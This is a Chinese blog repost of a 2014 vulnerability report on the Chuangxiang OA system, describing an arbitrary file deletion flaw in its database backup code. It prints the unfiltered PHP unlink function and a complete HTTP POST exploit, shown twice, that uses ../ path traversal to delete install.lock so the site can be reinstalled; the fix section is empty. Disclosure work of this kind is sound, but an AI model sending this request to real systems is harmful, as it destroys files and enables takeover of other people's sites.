记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

创想oa 任意文件删除漏洞(导致可重装网站)

2014-08-17 00:45

0x001 简介

{{Z]UOA%LYZR34O~@B%RNQW.jpg

北京天生创想信息技术有限公司自公司成立以来,天生创想始终致力于为中国企业特别是成长型企业提供专业信息化服务,在国内率先开创了以运营模式实现企业信 息化的先河。基于对成长型企业群体的特点和信息化需求的深刻理解,天生创想坚定地选择了“互联网应用”模式作为帮助企业实现信息化管理的手段。遵循这一理 念,天生创想已成功为无数企业客户提供了全方位、多层面的信息化解决方案。多年来的成功实践充分证明了“互联网应用”是最适合成长型企业的信息化实现模式。



0x002 客户群体 客户群体包括:政府、银行、企业、教育、公安、能源 等等单位

8{RGY`U{LP@N2GR%4CKW7TG.jpg





0x003 漏洞分析

在include/dbbackup.class.php中

* 删除备份文件

*

* @access public

* @parameter string $delfn备份文件名

* @return void

*/

public function del($delfn){

//删除多个备份文件

//var_dump($delfn);exit();

if(is_array($delfn)){

foreach($delfn as $fn){

if(!unlink($this->data_dir.$fn)){ return false;}

}

return true;

}

//删除单个备份文件



return unlink($this->data_dir.$delfn);

}





由于该处$delfn 直接从客户端传过来,未做任何过滤。

如该动作即可将data\db\目录下的sql备份文件删除。。。

JQEMID}_VR%@3]A28%AUK[6.jpg



我们可以可以通过构造好的路径,删除安装锁定文件install.lock

安装锁定文件在cache目录当中

在获取变量过程当中,又未对..\ 或者 ../这样的跳转字符做任何判断,导致攻击者可以采用此类字符跳转到其他目录,删除任意文件。。



0x04 exp复现

POST /oa/admin.php?ac=data&fileurl=mana&do=update HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://localhost/oa/admin.php?ac=data&fileurl=mana&do=data_import

Cookie: my_expand_3=3%2C4%2C; Hm_lvt_569322d6eae0bb12f168b4701cc26f09=1400129833,1400345987; PO_auth=MQkwN2MwZjQ5MmJiN2NmZTg4NTFiYWQ2MTBkZDQ5MzAxNA%3D%3D

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 60



choice%5B%5D=../../cache/install.lock&do=%E5%88%A0+%E9%99%A4



这样既可删除安装锁定文件。。。

E_T{6T}I(9[TQ[)}9I~3@6S.jpg

漏洞证明:

POST /oa/admin.php?ac=data&fileurl=mana&do=update HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://localhost/oa/admin.php?ac=data&fileurl=mana&do=data_import

Cookie: my_expand_3=3%2C4%2C; Hm_lvt_569322d6eae0bb12f168b4701cc26f09=1400129833,1400345987; PO_auth=MQkwN2MwZjQ5MmJiN2NmZTg4NTFiYWQ2MTBkZDQ5MzAxNA%3D%3D

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 60



choice%5B%5D=../../cache/install.lock&do=%E5%88%A0+%E9%99%A4



这样既可删除安装锁定文件。。。

E_T{6T}I(9[TQ[)}9I~3@6S.jpg

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-061293

阅读:110023 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“创想oa 任意文件删除漏洞(导致可重装网站)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云